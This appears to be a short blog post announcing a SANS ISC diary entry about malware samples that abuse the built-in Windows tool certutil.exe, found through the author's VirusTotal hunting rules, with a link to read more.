SANS ISC

[SANS ISC] A Suspicious Use of certutil.exe

I published the following diary on isc.sans.org: “A Suspicious Use of certutil.exe“:

The Microsoft operating system is full of command line tools that help to perform administrative tasks. Some can be easily installed, like the SysInternal suite[1] and psexec.exe, others are builtin in Windows and available to everybody. The presence of calls to such tools can help to detect suspicious behaviours. Why reinvent the wheel, if a tool can achieve what you need? I recently upgraded my hunting rules on VirusTotal to collect samples that are (ab)using the “certutil.exe” tool… [Read more]

Leave a Reply

Your email address will not be published. Required fields are marked *